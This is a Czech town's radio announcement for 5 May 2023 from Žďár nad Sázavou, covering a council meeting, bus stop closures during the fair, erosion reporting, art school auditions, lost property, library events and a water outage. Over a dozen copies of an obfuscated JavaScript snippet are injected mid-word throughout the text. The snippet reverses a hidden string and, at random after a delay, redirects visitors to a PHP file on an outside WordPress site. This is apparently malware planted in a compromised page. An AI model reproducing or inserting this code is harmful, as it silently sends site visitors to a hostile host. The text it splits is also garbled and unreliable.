Rainbow page separator

Hlášení městského rozhlasu vysílaného dne 5. května 2023

Pátek, 5. května 2023

Z ÚŘADU:

Starosta města Žďáru nad Sázavou Vás zve na 6. Zasedání Zastupitelstva města Žďár nad Sázavou, které se koná ve čtvrtek 11. května 2023 od 16:00 hodin ve velké zasedací místnosti městského úřadu. 

Odbor komunálních služeb oznamuje, že v souvislosti s pořádáním tradiční Žďárské pouti dochází k následujícím změnám ve vedení MHD:                                                                                                                      od úterý 9. května 2023 do pondělí 15. května 2023 včetně budou zrušeny zastávky MHD:

Libušínská – mís$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to zastávky MHD Libušínská je možné pro jednotlivé linky využít následující zastávky:

- linka č. 1 - nejbližší zastávka Studentská

                     - linka č. 4 - nejbližší zastávka Wonkova, Žižkova

                     - linka č. 5 - nejbližší zastávka Havlíčkovo nám.

                     - linka č. 8 - nejbližší zastávka Wonkova

 Libická (na ul. Revoluční) - linka č. 1 - pro spoj č. 3 je zrušena pro druhý průjezd, pro spoj 

č. 2 je náhradní zastávkou Brodská, obch. domy (na straně u obchodních domů)

- linka č. 3 - náhradní zastávka Brodská, obch.  domy (na straně u obchodních domů)       

- linka č. 8 - náhradní zastávka Brodská, obch. domy (na straně u obchodních domů)

Libická (u Orlovny) - náhradní zastávka Brodská, obch. domy (na straně u obchodu Qan$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to)

Sázavská - je zrušena bez náhrady. 

Bližší informace naleznete na webu města. Děkujeme za pochopení

 

Odbor životního prostředí žádá o pomoc ty z vás, kteří putují krajinou a není jim lhostejné jak vypadá a jak vypadat bude. Pokud se na svých cestách po blízkém i vzdálenějším okolí setkáte se známkami eroze (erozní rýhy, strže, plošná eroze) nebo uvidíte erozní splachy na komunikacích v okolí $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toků na trvalých travních porostech, žádáme o nahlášení $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to stavu na telefonní číslo 566 688 348 (Ing. Sylva Judová, Městský úřad), 727 957 201 (Ing. Marta Doležalová, Státní pozemkový úřad) nebo mailových adresách: $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:sylva.judova@zdarns.cz">sylva.judova@zdarns.cz, m.dolezalova2@spucr.cz nebo www.ziva-puda.cz/eroze

Základní umělecká škola Františka Drdly zve všechny zájemce o vzdělávání na škole v oboru hudebním, výtvarném, tanečním a literárně-dramatickém na talen$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tové průzkumy, které se budou konat ve čtvrtek 11. Května 2023 a v úterý 23. května 2023 vždy od 16.00 - 17.30 hodin v budově ZUŠ. 

Více informací o talen$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tových průzkumech ZUŠ naleznou všichni zájemci na www.zuszdar.cz

ZTRÁTY A NÁLEZY:

Městský úřad, odbor finanční oznamuje, že na ztráty a nálezy byly předány mobilní telefon, 1 ks náušnice, sluchátka, svazek klíčů, koloběžka a 2x ces$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovní taška + oblečení + reproduk$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tor. Seznam všech nalezených věcí je zveřejněn na úřední desce i na facebooku města. Bližší informace Vám poskytne Alena Benešová na tel. čísle 566 688 146 nebo osobně v kanceláři, 1. patro, dveře č. 35 – ztráty a nálezy. 

VYHLÁŠENÉ ZÁMĚRY:

KULTURNÍ POZVÁNKY:

Knihovna Matěje Josefa Sychry zve všechny děti do knihovny na tvůrčí dílnu věnovanou Dni matek, kterou povede Zdeňka Formánková. Akce se uskuteční ve středu 10. května 2023 od 14:00 hodin v dětském oddělení knihovny.

Dále Vás Knihovna Matěje Josefa Sychry zve na výstavu fo$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tografií Aleny Češkové - Úseky. Vernisáž výstavy proběhne ve čtvrtek 11. května 2023 od 17:00 hodin v Galerii u Sychry.

V Čechově domě je umístěna expozice obrazů Lenky Majorové – „Plňte si své sny... kdy jindy, když ne teď“. Výstava je ke zhlédnutí do konce června 2023.

 

VÝLUKY:

VAS, a. s. upozorňuje občany, že z důvodů nutných údržbářských prací na vodovodních řadech dojde k přerušení dodávky vody a $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to dne 10. května 2023 v době od 7:00 do 15:00 hodin. Plánovaná výluka se týká ul. Lučiny č. or. 1 – 4 a dále ul. Novoměstská č. o. 7, 9, 11, 17, garáže a Mountfield.  

 

KONEC HLÁŠENÍ